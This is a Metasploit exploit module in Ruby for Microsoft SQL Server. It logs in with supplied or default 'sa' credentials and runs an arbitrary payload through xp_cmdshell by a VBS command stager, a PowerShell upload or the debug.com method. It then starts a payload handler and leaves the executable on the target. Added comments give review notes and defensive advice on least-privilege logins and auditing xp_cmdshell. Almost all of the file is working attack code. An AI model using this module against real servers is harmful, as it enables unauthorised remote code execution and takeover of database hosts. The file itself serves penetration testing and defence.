##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for Microsoft SQL Server.
#
# Every delivery path in `exploit` ends up running commands through the
# MSSQL mixin's xp_cmdshell helpers (mssql_xpcmdshell, mssql_upload_exec,
# powershell_upload_exec); none of those helpers are defined in this file.
#
# Defensive note: `check` only reports Vulnerable when the authenticated
# login is a sysadmin, so least-privilege SQL logins are the primary
# mitigation. Auditing xp_cmdshell invocations (and, typically, the
# sp_configure change that enables the procedure) together with command
# execution under the SQL Server service process is the natural detection
# point for all three delivery methods described below.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MSSQL
  include Msf::Exploit::CmdStager
  # Allows reuse of an already-established MSSQL session; see the `session`
  # checks at the top of `check` and `exploit`.
  include Msf::OptionalSession::MSSQL
  # Alternative CmdStager mixins, left disabled by the original authors.
  # include Msf::Exploit::CmdStagerDebugAsm
  # include Msf::Exploit::CmdStagerDebugWrite
  # include Msf::Exploit::CmdStagerTFTP

  # Registers module metadata and the single module-specific option, METHOD
  # (ps, cmd, or old; default 'cmd'). Connection and credential options
  # (RHOST, USERNAME, SRVHOST, ...) are not registered here and presumably
  # come from the included mixins.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft SQL Server Payload Execution',
        # NOTE(review): 'wcsript.exe' below looks like a typo for 'wscript.exe';
        # it is a runtime string (module metadata), so it is left untouched here.
        'Description' => %q{
          This module executes an arbitrary payload on a Microsoft SQL Server by using
          the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported.

          First, the original method uses Windows 'debug.com'. File size restrictions are
          avoided by incorporating the debug bypass method presented by SecureStat at
          Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.

          A second method takes advantage of the Command Stager subsystem. This allows using
          various techniques, such as using a TFTP server, to send the executable. By default
          the Command Stager uses 'wcsript.exe' to generate the executable on the target.

          Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the
          payload on the target.

          NOTE: This module will leave a payload executable on the target system when the
          attack is finished.
        },
        'Author' => [
          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>', # original module, debug.exe method, powershell method
          'jduck' # command stager mods
        ],
        'License' => MSF_LICENSE,
        # The references describe weak/exposed 'sa' credentials, i.e. the
        # precondition for reaching xp_cmdshell, not a flaw in xp_cmdshell itself.
        'References' => [
          # 'sa' password in logs
          [ 'CVE', '2000-0402' ],
          [ 'OSVDB', '557' ],
          [ 'BID', '1281' ],

          # blank default 'sa' password
          [ 'CVE', '2000-1209' ],
          [ 'OSVDB', '15757' ],
          [ 'BID', '4797' ]
        ],
        'Platform' => 'win',
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'Targets' => [
          [ 'Automatic', {} ],
        ],
        # Stager flavor used by execute_cmdstager in the 'cmd' path of `exploit`.
        'CmdStagerFlavor' => 'vbs',
        'DefaultTarget' => 0,
        'DisclosureDate' => '2000-05-30',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
    register_options(
      [
        # Matched by prefix (case-insensitively) in `exploit`: cmd*, ps*/power*, else the old method.
        OptString.new('METHOD', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'cmd' ])
      ]
    )
  end

  # Vulnerability check.
  #
  # Reuses an existing session if one is present, otherwise logs in with the
  # datastore credentials. A failed login yields Detected (the service is
  # there, but we could not authenticate, so it is not reported as Safe);
  # a successful login is Vulnerable only if the login is a sysadmin.
  #
  # @return [Exploit::CheckCode] Detected, Vulnerable or Safe
  def check
    if session
      set_mssql_session(session.client)
    end

    unless session || mssql_login_datastore
      vprint_status("Invalid SQL Server credentials")
      return Exploit::CheckCode::Detected
    end

    # Result is discarded. NOTE(review): looks like a connectivity probe
    # before the privilege check — confirm, otherwise it could be dropped.
    mssql_query("select @@version", true)
    # USERNAME is not registered in this file; presumably a mixin option.
    if mssql_is_sysadmin
      vprint_good "User #{datastore['USERNAME']} is a sysadmin"
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  ensure
    # Always tear the connection down, including on the early return above
    # and on any exception raised by the mixin calls.
    disconnect
  end

  # Callback invoked by the CmdStager mixin for each staged command line
  # (the original author's note: this method is required for the CmdStager
  # to work). Each line is executed through xp_cmdshell.
  #
  # @param cmd [String] command line handed over by the stager (type assumed)
  # @param opts [Hash] stager options; accepted for the mixin's interface, unused here
  # @return whatever mssql_xpcmdshell returns (mixin-defined, not shown here)
  def execute_command(cmd, opts)
    # Second argument presumably controls output verbosity — mixin-defined.
    mssql_xpcmdshell(cmd, datastore['VERBOSE'])
  end

  # Exploit entry point.
  #
  # Authenticates (or reuses an existing session), then dispatches on METHOD:
  #   cmd*          -> Command Stager ('vbs' flavor, see 'CmdStagerFlavor')
  #   ps* / power*  -> generate_payload_exe + powershell_upload_exec
  #   anything else -> generate_payload_exe + mssql_upload_exec (presumably
  #                    the original debug.com method from the description)
  #
  # Note the asymmetry with `check`: a failed login here prints a status
  # line and returns nil rather than returning a CheckCode.
  def exploit
    if session
      set_mssql_session(session.client)
    else
      unless mssql_login_datastore
        print_status("Invalid SQL Server credentials")
        return
      end
    end

    method = datastore['METHOD'].downcase

    if (method =~ /^cmd/)
      # SRVHOST is not registered in this file (presumably a mixin option).
      # A wildcard bind address is replaced by Rex::Socket.source_address so
      # the stager advertises an address the target can actually reach.
      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
      # nodelete: the staged executable is kept on the target, consistent
      # with the NOTE in the module description.
      execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true })
    else
      # Generate the EXE; this is the same no matter which delivery mechanism is used.
      exe = generate_payload_exe

      # Use the PowerShell method for payload delivery if specified.
      # NOTE(review): `or` binds more loosely than `||`; harmless here because
      # the expression is the whole condition, but `||` is the conventional form.
      if (method =~ /^ps/) or (method =~ /^power/)
        powershell_upload_exec(exe)
      else
        # Otherwise, fall back to the old way..
        mssql_upload_exec(exe, datastore['VERBOSE'])
      end
    end

    # Start the payload handler, then drop the SQL connection. Unlike
    # `check`, this disconnect is not in an `ensure`, so an exception raised
    # earlier in this method skips it.
    handler
    disconnect
  end
end